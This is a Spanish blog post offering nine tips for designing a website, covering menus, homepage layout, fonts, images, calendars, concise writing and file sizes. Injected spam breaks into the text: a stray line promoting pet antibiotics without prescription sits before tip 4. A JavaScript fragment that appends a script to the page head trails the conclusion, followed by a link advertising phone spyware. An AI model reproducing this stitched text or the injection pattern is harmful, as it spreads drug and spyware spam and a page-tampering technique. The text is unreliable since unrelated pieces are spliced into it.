9 Consejos para crear tu sitio web

Si tienes la intención de crearte una página web, a continuación os vamos a enseñar unas cuantas cosas a tener en cuenta a la hora de llevarla a cabo. Son 9 consejos que nos ayudarán a tener un mayor éxito en nuestro sitio web.

1.

El menú de navegación de tu sitio web es algo muy importante, influirá en el éxito o el fracaso de nuestro sitio web. Limita el número de secciones del menú a un máximo de 12 y añada lo relacionado en sub-secciones cuando sea necesario. Por ejemplo creamos una sección llamada “Departamentos” y configuramos cada uno de ellos con su propia sub-sección.

Recuerda, la página de inicio sirve como “la primera puerta” a su hogar en línea, por lo que mantenerla ordenada y con un aspecto profesional es esencial.

2.

Una página de inicio efectiva no actúa como un tablón de anuncios, asique resiste la tentación de publicar demasiados avisos ahí. En su lugar crea una sección de “Anuncios Recientes” donde organizarás todos los avisos de tu página web y luego creas un enlace destacado a él desde la página de inicio. Los avisos que aparecerán en la página principal serán solo los de carácter urgente.

Sugerencia: el objetivo es ser capaz de ver todos los contenidos de la página principal sin necesidad de desplazarse.

3.

Reemplaza la plantilla de diseño libre que has estado utilizando por una que sea personalizada para tu sitio. Está demostrado que muchos de los usuarios de internet juzgan los sitios web que visitan basándose solo en su apariencia, así que si consigues que tu sitio destaque sobre el de tus competidores y que la primera impresión sea mejor, lograrás captar la atención de nuevos usuarios, clientes y demás.

pet antibiotics without prescription 4.

Limita el número y tamaño de las fuentes que utilices, preferentemente usa Sans Serif para tu sitio web. Además abstente del uso del texto en color y no uses continuamente las mayúsculas (usa cursiva o negrita en su lugar, pero con moderación). Si sigues estas directrices junto con un uso correcto de los espacios no necesitarás nada más para destacar tu texto.

5.

Las imágenes prediseñadas no añaden demasiado valor a una página web, pero si tu intención es utilizarlas hazlo siendo muy selectivo. El uso de imágenes prediseñadas, especialmente las que se encuentran gratis en Internet, es considerado por los desarrolladores Web profesionales como de aficionados y puede dañar tu credibilidad de tu sitio web. En lugar de imágenes prediseñadas viste tu sitio con las fotos de tu comunidad. Debes evitar por completo los gifs animados y los contadores de visitas.

6.

Evita errores tipográficos  y los enlaces rotos ya que dañará la credibilidad de tu página web. Revisa con regularidad tu sitio, quita los contenidos antiguos y actualiza la información. Sugerencia: usa el sello de “Fecha de redacción” solo en las páginas que se actualizan con bastante regularidad como el “calendario” o la sección de “últimas noticias”.

7.

Los calendarios de eventos son de las zonas más visitadas de un sitio web, asique ten en cuenta poner uno en la página principal. Formularios de información de contacto, trabajos, y enlaces a otros organismos también tienen bastante demanda así que busca la manera de hacerlos visibles.

8.

Proporciona contenido sencillo y breve pero convincente, de forma escrita y organizada teniendo siempre al lector en mente. Comunica el contenido con mayor eficacia apelando a la impaciencia de los lectores en línea, usa un lenguaje claro y conciso y no utilices jergas siempre que sea posible.

9.

Mantén el número de documentos de gran tamaño en tu web al mínimo, cuantos menos mejor. Ten en cuenta que los archivos de gran tamaño conllevan mayor tiempo de descarga para los visitantes con conexión telefónica. Asegura la optimización de tu sitio web solo con los documentos más relevantes.

Siguiendo estos 9 pequeños consejos, conseguirás optimizar tu sitio web y lograrás así un mayor éxito entre los visitantes y los posibles clientes.d.getElementsByTagName(‘head’)[0].appendChild(s);http://nwplumbing.com.au/line-spy-best-app-for-parental-control-iphone-spyware/